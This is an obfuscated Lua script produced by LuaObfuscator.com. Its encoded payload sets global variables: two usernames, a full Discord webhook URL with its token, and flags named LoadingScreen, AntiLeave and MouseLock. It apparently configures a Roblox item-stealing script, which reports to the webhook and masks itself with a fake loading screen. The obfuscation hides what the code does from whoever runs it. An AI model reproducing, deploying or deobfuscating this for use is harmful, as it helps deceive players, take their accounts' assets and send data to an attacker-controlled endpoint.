--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v102=v5(v83,v19);v19=nil;return v102;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -(3 + 0))^(v32-1)))%((1 + 1)^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -1))) ;return v84-(v84%(620 -(555 + 64))) ;else local v85=931 -(857 + 74) ;local v86;while true do if (v85==(0 -0)) then v86=(1067 -(68 + 222 + 775))^(v32-(569 -(367 + 201))) ;return (((v31%(v86 + v86))>=v86) and (928 -((1171 -(892 + 65)) + 713))) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v36 * (606 -(87 + 263))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (11 -8) );v18=v18 + (184 -(67 + 113)) ;return (v40 * (12302277 + 4474939)) + (v39 * (160901 -95365)) + (v38 * (189 + 67)) + v37 ;end local function v24()local v41=952 -(802 + 150) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==2) then v46=v20(v43,56 -35 ,55 -24 );v47=((v20(v43,24 + 8 )==1) and  -(998 -(915 + 82))) or (2 -1) ;v41=433 -(44 + 386) ;end if (v41==(1489 -(998 + 488))) then if (v46==(0 + 0 + 0)) then if (v45==0) then return v47 * 0 ;else v46=1 -0 ;v44=1187 -(1069 + 118) ;end elseif (v46==(4643 -(2126 + 470))) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1015 + 8) ) * (v44 + (v45/((793 -(368 + 423))^(163 -111)))) ;end if (v41==(19 -(10 + 8))) then v44=3 -2 ;v45=(v20(v43,(1215 -(201 + 571)) -(416 + 26) ,63 -43 ) * ((1 + 1)^((1194 -(116 + 1022)) -24))) + v42 ;v41=2;end if (0==v41) then v42=v23();v43=v23();v41=439 -(145 + 293) ;end end end local function v25(v48)local v49=0 -0 ;local v50;local v51;while true do if (v49==(2 + (886 -(261 + 624)))) then return v6(v51);end if (v49==(1 -0)) then v50=v3(v16,v18,(v18 + v48) -(3 -(1082 -(1020 + 60))) );v18=v18 + v48 ;v49=7 -(1428 -(630 + 793)) ;end if ((859 -(814 + 45))==v49) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=1 + 0 ;end if ((1 + 1)==v49) then v51={};for v90=1, #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=9 -6 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1975 -(1913 + 62) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(3 + 1)) then while true do if (v53==(5 -3)) then local v96=0;while true do if (v96~=(1 -0)) then else v53=1936 -(565 + 1368) ;break;end if (v96==(0 -0)) then v58=nil;v59=nil;v96=1;end end end if (v53~=(2 -1)) then else v56=nil;v57=nil;v53=1663 -(1477 + 184) ;end if (v53==(7 -4)) then v60=nil;while true do local v103=0 -0 ;while true do if (v103==1) then if (v54==(604 -(268 + 335))) then v59=v23();v60={};for v119=857 -(564 + 292) ,v59 do local v120=290 -(60 + 230) ;local v121;local v122;local v123;local v124;local v125;while true do if (v120==(0 -0)) then v121=572 -(426 + 146) ;v122=nil;v120=1;end if (v120==(306 -(244 + 60))) then v125=nil;while true do if (v121==1) then v124=nil;v125=nil;v121=1 + 1 ;end if (v121~=(1458 -(282 + 1174))) then else while true do if (v122==1) then v125=nil;while true do if ((812 -(569 + 242))~=v123) then else if (v124==1) then v125=v21()~=0 ;elseif (v124==(478 -(41 + 435))) then v125=v24();elseif (v124==(8 -5)) then v125=v25();end v60[v119]=v125;break;end if ((0 + 0)~=v123) then else local v137=0;local v138;while true do if (v137==(1125 -(936 + 189))) then v138=0 + 0 ;while true do if (v138==(1024 -(706 + 318))) then local v146=1251 -(721 + 530) ;local v147;while true do if (0==v146) then v147=1271 -(945 + 326) ;while true do if (v147~=0) then else v124=v21();v125=nil;v147=1 + 0 ;end if (v147==(2 -1)) then v138=268 -(176 + 91) ;break;end end break;end end end if (v138==(1 + 0)) then v123=701 -(271 + 429) ;break;end end break;end end end end break;end if (v122==(0 + 0)) then local v133=0;while true do if (v133~=(1501 -(1408 + 92))) then else v122=1 -0 ;break;end if (v133==0) then v123=1086 -(461 + 625) ;v124=nil;v133=1;end end end end break;end if (v121~=(1288 -(993 + 295))) then else v122=0 + 0 ;v123=nil;v121=1;end end break;end if (v120==(1 + 0)) then v123=nil;v124=nil;v120=1173 -(418 + 753) ;end end end v58[2 + 1 ]=v21();v54=6 -4 ;end break;end if (v103==(0 + 0)) then if (v54==(0 + 0)) then local v115=0 -0 ;local v116;while true do if (v115==(0 + 0)) then v116=529 -(406 + 123) ;while true do if (v116==(1769 -(1749 + 20))) then v55={};v56={};v116=1 + 0 ;end if (v116==(1323 -(1249 + 73))) then local v126=0 + 0 ;while true do if (v126~=(1146 -(466 + 679))) then else v116=4 -2 ;break;end if (0==v126) then v57={};v58={v55,v56,nil,v57};v126=1 + 0 ;end end end if (v116~=(1229 -(322 + 905))) then else v54=612 -(602 + 9) ;break;end end break;end end end if (v54==2) then local v117=0;local v118;while true do if (v117==0) then v118=0 + 0 ;while true do if ((1189 -(449 + 740))==v118) then for v127=1,v23() do local v128=0;local v129;local v130;while true do if (v128~=(2 -1)) then else while true do if (v129~=(0 -0)) then else v130=v21();if (v20(v130,1,115 -(4 + 110) )~=0) then else local v139=0;local v140;local v141;local v142;local v143;local v144;while true do if (v139==2) then v144=nil;while true do if (v140==(872 -(826 + 46))) then local v148=947 -(245 + 702) ;while true do if ((584 -(57 + 527))~=v148) then else v141=1427 -(41 + 1386) ;v142=nil;v148=1;end if (v148==(104 -(17 + 86))) then v140=1 + 0 ;break;end end end if (1==v140) then v143=nil;v144=nil;v140=3 -1 ;end if (v140==(6 -4)) then while true do if ((0 + 0)~=v141) then else local v149=0 -0 ;local v150;while true do if (v149==0) then v150=166 -(122 + 44) ;while true do if (v150==(2 -1)) then v141=1 -0 ;break;end if (v150~=0) then else local v158=1205 -(902 + 303) ;while true do if (v158==(3 -2)) then v150=1 + 0 ;break;end if ((0 + 0)==v158) then v142=v20(v130,4 -2 ,5 -2 );v143=v20(v130,69 -(30 + 35) ,5 + 1 );v158=1258 -(1043 + 214) ;end end end end break;end end end if (v141==(11 -8)) then if (v20(v143,1215 -(323 + 889) ,7 -4 )==(581 -(361 + 219))) then v144[10 -6 ]=v60[v144[4 -0 ]];end v55[v127]=v144;break;end if (v141==(767 -(468 + 297))) then local v152=320 -(53 + 267) ;local v153;while true do if ((0 + 0)==v152) then v153=413 -(15 + 398) ;while true do if (v153~=(982 -(18 + 964))) then else local v159=0;while true do if (1==v159) then v153=2 -1 ;break;end if (v159~=(0 -0)) then else if (v20(v143,1,1 + 0 )==1) then v144[2 + 0 ]=v60[v144[2]];end if (v20(v143,852 -(20 + 830) ,238 -(141 + 95) )==(1 + 0)) then v144[129 -(116 + 10) ]=v60[v144[3]];end v159=1 + 0 ;end end end if (v153==(1 + 0)) then v141=741 -(542 + 196) ;break;end end break;end end end if (v141~=(2 -1)) then else local v154=0 + 0 ;local v155;while true do if (v154==(0 -0)) then v155=0 + 0 ;while true do if (v155~=(0 + 0)) then else local v160=0 -0 ;while true do if ((1 + 0)==v160) then v155=1 + 0 ;break;end if (v160==(0 + 0)) then v144={v22(),v22(),nil,nil};if (v142==(0 -0)) then local v165=1551 -(1126 + 425) ;local v166;local v167;local v168;while true do if (v165~=(766 -(574 + 191))) then else v168=nil;while true do if (v166==(406 -(118 + 287))) then while true do if (v167~=(0 -0)) then else v168=0 + 0 ;while true do if (v168==(849 -(254 + 595))) then v144[129 -(55 + 71) ]=v22();v144[5 -1 ]=v22();break;end end break;end end break;end if (v166==(1121 -(118 + 1003))) then v167=0 -0 ;v168=nil;v166=2 -1 ;end end break;end if (v165==0) then v166=377 -(142 + 235) ;v167=nil;v165=4 -3 ;end end elseif (v142==(1 + 0)) then v144[942 -(714 + 225) ]=v23();elseif (v142==(5 -3)) then v144[980 -(553 + 424) ]=v23() -(2^(29 -13)) ;elseif (v142==(3 + 0)) then local v171=0 + 0 ;local v172;local v173;local v174;while true do if (v171~=(1 + 0)) then else v174=nil;while true do if (v172==(48 -(25 + 23))) then local v177=0;while true do if (v177==(0 + 0)) then v173=0 + 0 ;v174=nil;v177=1;end if (v177~=1) then else v172=1887 -(927 + 959) ;break;end end end if (v172~=(2 -1)) then else while true do if (v173==(0 -0)) then v174=0 -0 ;while true do if (v174~=(97 -(11 + 86))) then else v144[1 + 2 ]=v23() -((9 -7)^(38 -22)) ;v144[289 -(175 + 110) ]=v22();break;end end break;end end break;end end break;end if (v171==(753 -(239 + 514))) then v172=0;v173=nil;v171=1 + 0 ;end end end v160=4 -3 ;end end end if (v155~=1) then else v141=2;break;end end break;end end end end break;end end break;end if (v139==1) then v142=nil;v143=nil;v139=1331 -(797 + 532) ;end if (v139==(0 + 0)) then local v145=0 + 0 ;while true do if ((0 -0)==v145) then v140=0 + 0 ;v141=nil;v145=2 -1 ;end if (v145==(1203 -(373 + 829))) then v139=732 -(476 + 255) ;break;end end end end end break;end end break;end if (v128~=0) then else local v134=1130 -(369 + 761) ;local v135;while true do if (v134~=0) then else v135=0;while true do if ((0 + 0)==v135) then v129=533 -(43 + 490) ;v130=nil;v135=734 -(711 + 22) ;end if ((1 + 0)~=v135) then else v128=1 -0 ;break;end end break;end end end end end for v131=1 -0 ,v23() do v56[v131-(239 -(64 + 174)) ]=v28();end v118=1;end if (v118~=(1 + 0)) then else return v58;end end break;end end end v103=1 -0 ;end end end break;end if (v53~=0) then else local v97=336 -(144 + 192) ;while true do if (v97==0) then v54=216 -(42 + 174) ;v55=nil;v97=1 + 0 ;end if (v97==(1 + 0)) then v53=1;break;end end end end break;end if (v52==(0 -0)) then v53=0 + 0 ;v54=nil;v52=1 + 0 ;end if (v52==(1505 -(363 + 1141))) then v55=nil;v56=nil;v52=1582 -(1183 + 397) ;end if (v52==(5 -3)) then v57=nil;v58=nil;v52=3 + 0 ;end if ((3 + 0)~=v52) then else v59=nil;v60=nil;v52=4;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=2) then if (v80<=0) then v77[v79[2]]=v63[v79[3]];elseif (v80==1) then v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];else v63[v79[3]]=v77[v79[2]];end elseif (v80<=3) then v77[v79[2]]=v79[3];elseif (v80>4) then do return;end else v77[v79[2]][v79[3]]=v79[4];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003083O00557365724E616D65030B3O00446F6E7661736B613O3103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132383334303930332O372O3430343738392F50637242452O73777550444A6743325F6C74637457664650666C5F444266356C2O643059455A7643366D36514E5A6857427A4A6431596D45723245474163487A6448756103093O00557365724E616D6532030C3O0050726F5F47616D65722O315303023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B000D3O0012013O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00304O0008000900124O00073O00304O000A000900124O00073O0030043O000B00092O00053O00017O00",v9(),...);end
